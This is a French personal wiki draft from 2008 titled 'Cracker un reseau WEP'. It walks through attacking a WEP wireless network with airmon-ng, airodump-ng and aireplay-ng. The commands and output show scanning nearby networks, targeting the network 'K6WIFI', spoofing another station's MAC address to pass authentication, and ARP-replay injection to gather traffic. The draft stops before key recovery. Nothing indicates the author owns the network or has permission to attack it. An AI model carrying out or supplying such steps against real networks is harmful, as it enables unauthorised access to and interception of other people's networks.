tj - Wiki

Outils pour utilisateurs

Outils du site

Piste : brouillon_wep
brouillon_wep

Ceci est une ancienne révision du document !

Cracker un reseau WEP

Lien: http://www.tuto-fr.com/tutoriaux/tutorial-crack-wep-aircrack.php

Avec un eeePC …

Interface Wifi

Voir les interfaces Wifi disponible: 

# airmon-ng
Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)

Demarrer le monitor sur l'interface wifi0 

# airmon-ng start wifi0
Interface       Chipset         Driver

wifi0           Atheros         madwifi-ngError for wireless request "Set Frequency" (8B04) :
    SET failed on device ath1 ; No such device.
ath1: ERROR while getting interface flags: No such device

ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath2            Atheros         madwifi-ng VAP (parent: wifi0)

Oups: c'est quoi cette erreur ?

Capter les reseaux… 

# airodump-ng --write fichier ath2
CH 12 ][ Elapsed: 7 mins ][ 2008-04-20 00:36

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 
16:78:DF:XX:XX:7E   38      808        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
16:78:DF:XX:XX:7D   36      800        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
16:78:DF:XX:XX:7C   35      792        1    0  13  54  WEP  WEP         K6WIFI
16:78:DF:XX:XX:7F   36      797        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
6E:6A:97:ZZ:ZZ:8D   26      848        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
6E:6A:97:ZZ:ZZ:8C   26      805        0    0  13  54  WPA2 CCMP   PSK  <length:  0>
6E:6A:97:ZZ:ZZ:8F   28      811        0    0  13  54  WPA  TKIP   MGT  freephonie
6E:6A:97:ZZ:ZZ:8E   28      832        0    0  13  54  WPA2 CCMP   PSK  <length:  0>

BSSID              STATION            PWR  Lost  Packets  Probes

(not associated)   00:03:9D:XX:XX:XX   37    31      784  K6WIFI
(not associated)   00:15:AF:XX:XX:XX    0     0       36

On s'interesse au reseau “WEP” et/ou dont la colonne #Data est non nulle.

On affine l'ecoute sur le reseau faible: 

# airodump-ng --write test2 --channel 13 --bssid 16:78:DF:XX:XX:7C ath2

On emprunte la MAC d'une station et on teste qu'on peut l'emprunter (c'est pour le cas d'un filtrage par IP) 

# aireplay-ng -1 0 -e K6WIFI -a 16:78:DF:XX:XX:7C -h 00:03:9D:XX:XX:XX ath2
The interface MAC (06:15:AF:XX:XX:XX) doesn't match the specified MAC (-h).
        ifconfig ath2 hw ether 00:03:9D:XX:XX:XX
01:05:12  Waiting for beacon frame (BSSID: 16:78:DF:XX:XX:7C)
01:05:12  Sending Authentication Request
01:05:12  Authentication successful
01:05:12  Sending Association Request
01:05:13  Association successful :-)

On simuler un tas de paquet avec la MAC …

:!: Il faut être dans le même repertoire

Sur une console, on demarre l'ecoute: 

# airodump-ng --write test2 --channel 13 --bssid 16:78:DF:XX:XX:7C ath2

Sur l'autre, on existe (__même repertoire!) on existe le réseau: 

# aireplay-ng -3 -e K6WIFI -b 16:78:DF:XX:XX:7C -h 00:03:9D:XX:XX:XX ath2

(Notez les petits changement dans les options: -3 et -b)

brouillon_wep.1208648254.txt.gz · Dernière modification : 2008/04/19 23:37 de thierry